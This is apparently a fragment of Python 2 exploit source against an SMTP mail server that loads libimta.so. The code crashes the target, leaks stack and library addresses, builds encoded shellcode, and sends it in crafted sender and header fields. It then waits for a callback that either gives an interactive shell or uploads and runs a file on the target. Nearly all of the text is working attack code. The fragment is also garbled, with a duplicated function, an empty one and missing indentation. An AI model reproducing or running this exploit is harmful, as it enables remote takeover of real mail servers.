def crash(self):
self.startNewMsg()
sd = self.sd
smtpUtils.sendMsg(sd, self.buildCrashBuffer(), self.buildCoverupBuffer())
try:
smtpUtils.recvReply(sd)
except smtpUtils.smtpServerCrashed, err:
print "Successfully crashed the target."
self.conn = 0
return 0
def exploit(self):
try:
attempt = self.attempt
except AttributeError:
attempt = self.attempt = 1
nAttempts = self.nAttempts
challenge = utils.buildBuffer(4, self.badBytes)
shellcodeBuf = self.os.buildShellcodeBuffer(self,
utils.buf2long(challenge))
bounceBuf = self.buildBounceBuffer()
self.startNewMsg()
sd = self.sd
if ((attempt == self.nAttempts) and (1 == attempt)):
print "\nSending exploit:"
elif (attempt <= self.nAttempts):
print "\nSending exploit (attempt %d of %d):" % (attempt, nAttempts)
else:
return 1
smtpUtils.sendMsg(sd, bounceBuf, shellcodeBuf)
try:
reply = smtpUtils.recvReply(sd)
except smtpUtils.smtpServerCrashed, err:
print "FAILURE!"
print "Target crashed -- probably because we were not talking to " \
"the correct thread."
self.attempt += 1
return self.exploit()
def stackTouch(self, target, bruteForce=False):
print "\nLooking for a %s stack:" % self.version
stackBase = self.stackBase
leakBuf = self.buildStackLeakBuffer(target, stackBase)
target.startNewMsg()
sd = target.sd
smtpUtils.sendMsg(sd, leakBuf)
try:
reply = smtpUtils.recvReply(sd)
except smtpUtils.smtpError, err:
err.printMsg(" looking for a %s stack" % self.version)
return 1
def stackTouch(self, target, bruteForce=False):
print "\nLooking for a %s stack:" % self.version
stackBase = self.stackBase
leakBuf = self.buildStackLeakBuffer(target, stackBase)
target.startNewMsg()
sd = target.sd
smtpUtils.sendMsg(sd, leakBuf)
try:
reply = smtpUtils.recvReply(sd)
except smtpUtils.smtpError, err:
err.printMsg(" looking for a %s stack" % self.version)
return 1
else:
imtaBase = self.imtaBase
try:
leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase)
except IndexError, err:
print "out of addrs"
#self.crash()
#connect
#ehlo
#self.conn = 0
#leakBuf, matchBuf = self.buildImtaLeakBuffers(imtaBase)
self.startNewMsg()
sd = self.sd
smtpUtils.sendMsg(sd, leakBuf)
try:
reply = smtpUtils.recvReply(sd)
except smtpUtils.smtpError, err:
err.printMsg("")
return 1
if (matchBuf != reply):
print "Target replied with:"
utils.dumpHex(reply)
print "Expected:"
utils.dumpHex(matchBuf)
sd.close()
return 1
print "Found libimta.so at 0x%08x." % imtaBase
self.imtaBase = imtaBase
return 0
def startNewMsg(self):
def recv4(s):
r = ''
while (4 != len(r)):
reply = smtpUtils.recvReply(s, 4 - len(r))
r += reply
return r
def doExploit(parms):
target = targets.factory(parms.get('target', None), badBytes)
if (None == target):
print "No target OS specified."
return -1
cport = parms.get('cport', None)
clport = parms.get('clport', None);
if (None == cport):
ld, cport = bindCallbackListener(cport, clport)
else:
ld = bindCallbackListener(cport, clport)
cip = parms.get('cip')
callback.cip = socket.inet_aton(cip)
callback.cport = utils.u16ToBeU16String(cport)
authCode = utils.randomBase64(4,6)
callback.authCode = authCode
ufile = parms.get('upload', None)
if (None != ufile):
tmpnam = parms.get('tmpnam', None)
if (None == tmpnam):
tmpnam = utils.tmpnam()
efile = parms.get('exec', None)
if ((None != efile)
and not (os.access(efile, os.F_OK or os.X_OK))):
print "%s either does not exist or is not executable" % efile
ld.close()
return -1
fd = open(ufile, 'r')
ufileContents = fd.read()
fd.close()
mask = chr(random.randint(0,255))
upload.data = mask # okay, so I mean upload.mask, but oh well
upload.tmpnam = tmpnam + "\0"
unencoded = callback.build() + upload.build()
else:
unencoded = callback.build() + interactive.build()
encoded = dulEncode(unencoded)
domain = parms.get("domain", None)
if (None == domain):
domain = utils.buildBuffer(0xe, badBytes)
senderBegin = '\"' + utils.buildBuffer(3, badBytes)
senderEnd = "\"@" + domain
recipient = parms.get('recipient')
finderValue = utils.buildBuffer(4, badBytes)
sender2 = target.buildSender2(finderValue)
if (None == sender2):
print "Error building exploit message."
ld.close()
return -1
body = finderValue + encoded
tip = parms.get('tip')
tport = parms.get('tport')
sd, banner = smtpUtils.connect(tip, tport, True)
print banner.strip()
if (None == re.compile(target.banner).search(banner)):
print "The target's banner does not match expected banner."
response = ' '
while (("y" != response[0]) and ("n" != response[0])):
response = string.lower(raw_input("Continue [y/N]? "));
if ('' == response):
response = "n"
if ("n" == response[0]):
sys.exit()
smtpUtils.helo(sd, domain, validResponse)
sent = 0
maxLen = 0xff - len(senderBegin) - len(senderEnd)
chop = maxLen % 4
maxLen -= chop
atimeout = parms.get('atimeout', None)
if ("None" == atimeout):
atimeout = None
print "Sending a maximum of %d messages..." % (maxLen // 4)
for fillLen in range(maxLen, 0, -4):
# poll to see if we've received a callback
status, ad = waitForCallback(ld, authCode, 0, atimeout)
if (1 != status):
smtpUtils.quit(sd)
print "Sent %d messages." % sent
break
# send a new message
sender1 = senderBegin
senderBody = target.buildSender1(fillLen)
if (None == senderBody):
ld.close()
return -1
sender1 += senderBody
sender1 += senderEnd
try:
smtpUtils.mailFrom(sd, sender1, validResponse)
smtpUtils.rcptTo(sd, recipient, validResponse)
except smtpUtils.smtpError, err:
err.printMsg()
print "\nSent %d messages." % sent
ld.close()
return -1
smtpUtils.data(sd)
smtpUtils.sendMsg(sd, "From: " + sender2, "Keywords: " + body)
buf = smtpUtils.recvReply(sd).strip()
print "%s:\t%s" % (hex(fillLen), buf)
sent += 1